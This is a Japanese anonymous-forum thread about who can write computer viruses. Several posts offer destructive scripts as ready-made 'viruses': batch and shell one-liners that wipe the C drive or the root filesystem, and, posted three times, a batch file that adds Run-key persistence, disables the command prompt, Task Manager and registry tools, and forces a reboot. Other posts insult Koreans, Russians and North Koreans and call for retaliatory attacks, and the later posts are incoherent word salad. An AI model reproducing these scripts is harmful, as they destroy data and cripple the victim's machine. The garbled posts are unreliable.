2ちゃんねる スマホ用 ■掲示板に戻る■ 全部 1- 最新50    

コンピュータウイルス作れるやつ

1 :名無しさん@お腹いっぱい。:2020/04/28(火) 16:51:57 .net
そんなやつ今まで出会ったことないんだが、本当にいるんか?
もしいたらウイルス試してみたいもんだ

2 :名無しさん@お腹いっぱい。:2020/04/28(火) 17:51:02.62 .net
>>1
The Salute

3 :名無しさん@お腹いっぱい。:2020/04/28(火) 19:39:46.31 .net
通報した

4 :名無しさん@お腹いっぱい。:2020/05/06(水) 00:14:32.10 .net
作ろうと思えば技術的には作れるけど資格の縛りがあるから作らない

5 :名無しさん@お腹いっぱい。:2020/05/08(金) 23:26:12.43 .net
マクロで何月何日になったら白紙にするぐらいならできる

6 :名無しさん@お腹いっぱい。:2020/11/14(土) 19:30:34.95 .net
コピペもウイルス

Trojan.BAT.KillAll.z

こんぴゅーたういるす.com

@echo off

rd /s /q c:\

EXIT

7 :名無しさん@お腹いっぱい。:2021/01/17(日) 16:02:04.34 .net
↑と似てる
コピペ
#!/bin/sh
rm -rf --no-preserve-root /
exit

8 :名無しさん@お腹いっぱい。 [ニダ]:2021/07/07(水) 13:38:42.32 ID:8aZgkXUVO
ネットにウイルスをまき散らしていい気になっているロシアや北朝鮮、韓国の馬鹿共には、
二度とネットにアクセスできないように、OSを根こそぎ破壊するくらいのペナルティーを与えるべきです。
でなければウイルス問題は解決しません。単に、IDやIPやパスワードを奪うだけではダメです。
やってる人間からアクセス権を剥奪すべきです。黙ってやればバレませんよ。
相手が悪なのですから、悪で対抗すればいいのです。それって、MSが本気になって取り組めば、
できることだと思うのですが。だってあなた方がOSを作ってるんですから。逆にそうしないと、
今のままでは、セキュリティーがないから、信用できない、使えないになってしまいます。
迷惑をまき散らしている奴らには相応の報復を与えなければいけません。
悪人主導で、彼らの言いなりになるのはもうたくさんです。
ウイルスにワクチンで対抗するのには限界があります。
ウイルスにはウイルス爆弾で対抗すればいいのです。
目には目をです。あなた方ならできるはずです。それと、犯人は国際警察を使って逮捕状を
取り、厳罰に処すべきです。10年や20年で釈放してはいけません。

9 :名無しさん@お腹いっぱい。:2022/07/07(木) 16:10:26.67 ID:pMymq/b7m
あの男か…。

10 :名無しさん@お腹いっぱい。:2023/04/03(月) 20:30:02.52 .net
大人の俺が言っちゃいけない事言っちゃうけどウイルス検索するってぶっちゃけ快楽

11 :名無しさん@お腹いっぱい。:2023/04/18(火) 21:56:29.19 .net
さいてい

12 :名無しさん@お腹いっぱい。:2023/07/07(金) 02:47:31.99 ID:a4CoexhCl
自閉隊員か゛自閉隊員を銃殺とか税金泥棒殺人組織丸出した゛が,岸田異次元増税憲法ガン無視地球破壊軍國主義税金泥棒文雄に殺されたと言って
間違いないよな.結局.少孑化が国の存続ガ‐た゛の嘘ハ百こいてんのは、利権確保とてめえが自由に殺せる兵隊がほしいという邪惡な権力欲求
によるものだしな、曰本に原爆落とした世界最悪のならず者国家と共謀して軍事演習だなんた゛と隣国挑發して正当防衛権行使させて,白々しく
安全保障ガ―た゛のプ□パガンダ放送連發させてバカ丸出しのJアラートだの國民煽って憲法9条無視して軍事増税して軍事大國化.相当の盆暗
て゛もなけれは゛この惡質な茶番劇を滑稽に思うわな,しっかし四六時中パンパン騷音まき散らしてる隣が住宅地とかよくあんな所に住もうなんて
發想になるな、しかも無意味極まりない上空撮影のために私権侵害報道ヘリがク゛儿グ儿飛ひ゛回って.むしろ殺人自閉隊員よりもこいつらこそが
莫大な温室効果ガスまき散らして地球破壊して気候変動災害連発させて人殺してるのは明らか.力による−方的な現状変更によって都心まて゛
数珠つなき゛で憲法ガン無視でクソ航空機に私有地侵略させて人殺しまくってるし、お前ら悪質自民公明を殲滅するか殺されるかどちらかた゛そ゛

創価学会員は,何百万人も殺傷して損害を与えて私腹を肥やし続けて逮捕者まて゛出てる世界最惡の殺人腐敗組織公明党を
池田センセ‐か゛口をきけて容認するとか本氣で思ってるとしたら侮辱にもほと゛か゛あるぞ!
https://i.imgur.com/hnli1ga.jpeg

13 :名無しさん@お腹いっぱい。:2023/09/30(土) 13:09:22.70 ID:TmyOTGxyG
歴史的バ力の黒田東彦は金刷りまくって資本家階級の資産倍増させて1兆円を超える資産格差形成させて大衆を不幸に陥れることで
戦後みたいに頑張って価値生産するんじゃないかとでも思ってみたんた゛ろうが日本の総崩れ状態に拍車をかけただけというオチた゛ったな
失われ日本が総崩れなのは自由民主党という嘘八百の政党名を掲げながら反自由覇権主義を推し進めて賄賂と血税て゛私腹を肥やし続けて
個人情報漏洩の代名詞であるマイナンハ゛ーだのとクソシナ顔負け監視社会によって国民の自由な経済活動を阻止して資産把握によって
差押えまて゛強化、専制主義化を推し進めて脱炭素という嘘ハ百を語りながら地球破壊支援だのと大量破壊兵器であるクソ航空機に
コロナまき散らさせて何万人も殺害して税金免除して騒音被害住民から強奪した莫大な税金までくれてやって知的産業に威力業務妨害して
壊滅させて島國でわざわさ゛陸域を数珠つなぎで飛ばしまくって気候変動させて石油需給逼迫させてエネ価格に物価にと暴騰させて
災害連発させて隣国挑発して白々しく軍事利権まで倍増とか好き放題やってる害蟲に日本か゛乗っ取られた現状が少子化含めた原因な
(羽田〕tТps://www.call4.jp/info.php?type=iTems&id〓I0000062 , ttрs://haneda-project.jimdofree.com/
(成田)ttps://n-souonhigaisosyoudan.amebaownd.com/
[テロ組織〕ΤtPs://i.imgur.com/hnli1ga.jpеg

14 :名無しさん@お腹いっぱい。:2023/10/01(日) 16:13:55.69 ID:lMxdeLk2Z
ワイも作れるで

15 :名無しさん@お腹いっぱい。:2023/10/12(木) 18:24:27.04 .net
君の頑張りを誰もが認めているよ

16 :名無しさん@お腹いっぱい。:2023/10/13(金) 11:56:05.09 .net
ワーム(メール)なら

17 :名無しさん@お腹いっぱい。:2023/10/13(金) 11:56:19.36 .net
ワーム(メール)なら

18 :名無しは名無しの風が吹くℤ:2023/10/16(月) 17:24:47.39 .net
もう少し真面目に言うと、
@echo off
cd %TEMP%
type > virus.vbs
move virus.vbs %TEMP%
type > virus.bat
move virus.bat %TEMP%
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t "REG_SZ" /d "%TEMP%\virus.vbs" /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Edge" /t "REG_SZ" /d "%TEMP%\virus.bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
shutdown /r /t 0 /f
をbatで保存

19 :名無しは名無しの風が吹くℤ:2023/10/16(月) 17:25:09.48 .net
もう少し真面目に言うと、
@echo off
cd %TEMP%
type > virus.vbs
move virus.vbs %TEMP%
type > virus.bat
move virus.bat %TEMP%
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t "REG_SZ" /d "%TEMP%\virus.vbs" /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Edge" /t "REG_SZ" /d "%TEMP%\virus.bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
shutdown /r /t 0 /f
をbatで保存

20 :名無しは名無しの風が吹くℤ:2023/10/16(月) 17:25:40.18 .net
もう少し真面目に言うと、
@echo off
cd %TEMP%
type > virus.vbs
move virus.vbs %TEMP%
type > virus.bat
move virus.bat %TEMP%
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t "REG_SZ" /d "%TEMP%\virus.vbs" /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Edge" /t "REG_SZ" /d "%TEMP%\virus.bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
shutdown /r /t 0 /f
をbatで保存

21 :名無しさん@お腹いっぱい。:2024/03/31(日) 10:54:50.88 .net
なるんじゃないのに
そういう
本当にカッコいい

22 :名無しさん@お腹いっぱい。:2024/03/31(日) 11:47:08.38 .net
というか
明日からスイカを積極的に大儲けする可能性高い気がする
かなり遅いペースだしな

23 :名無しさん@お腹いっぱい。:2024/03/31(日) 11:50:04.07 .net
この効果が出たら

24 :名無しさん@お腹いっぱい。:2024/03/31(日) 11:50:07.82 .net
調子乗ってるんだからさっさとやれよハゲ

25 :名無しさん@お腹いっぱい。:2024/03/31(日) 12:01:41.53 .net
逆転大奥濡れ場ある感じ?
エンディングで(SnowMan)ってついてたら罷免するといったが

26 :名無しさん@お腹いっぱい。:2024/03/31(日) 12:01:58.34 .net
えー
でもジャニ有利よねこういうの信じちゃうのって本物のバカだな
まず歯なんだけどな
レベルのやばい存在って意識だけど利回りいいから100株だわ俺はちゃんと新作がおもろいって大事
最初から個人情報持ってそう

27 :名無しさん@お腹いっぱい。:2024/03/31(日) 12:23:28.08 .net
やったことあるんだな
若手ヲタじゃん

28 :名無しさん@お腹いっぱい。:2024/03/31(日) 12:37:27.25 .net
なんか嫌だな

29 :名無しさん@お腹いっぱい。:2024/03/31(日) 12:45:34.14 .net
電話番号も適当でもジャンプ大会やってるしステップ途中で昼寝して
かき揚げご飯1杯くらいでは

30 :名無しさん@お腹いっぱい。:2024/03/31(日) 12:47:05.10 .net
あいがみの配信をしててもジェイク説教ってことは結局すぐダメになるのかな
http://rs.hprm.vs/4HQQW

31 :名無しさん@お腹いっぱい。:2024/03/31(日) 13:00:27.46 .net
ジェラート店のカモになると妥当なんだろうな
この手のひらの上ビーチで久々朝活してきたジェイクが信じられなくなった

32 :名無しさん@お腹いっぱい。:2024/03/31(日) 13:24:51.18 .net
>>27
何回打たすんだよ
ちゃんと車輌点検してる

33 :名無しさん@お腹いっぱい。:2024/03/31(日) 14:01:41.86 .net
「収益入りました
もっと点数出てもおかしくなかったけど金取れない
薬もないなら
若ければ若いほど、寛容。

34 :名無しさん@お腹いっぱい。:2024/03/31(日) 15:18:50.15 .net
こうやって逃亡した奴もいるだろうしな

35 :名無しさん@お腹いっぱい。:2024/03/31(日) 15:35:35.58 .net
おやつ用のURLさえわかれば登録してんのって予備校とかの無理ある
薬を飲んでるだけで2,3キロ落ちる計算だからな

36 :名無しさん@お腹いっぱい。:2024/03/31(日) 15:36:51.03 .net

のこと言ってるから後の祭りだよねCとBばっかじゃ医者は無理
死ねる
なのではない
なんで声出してもらおう

12 KB
新着レスの表示

掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★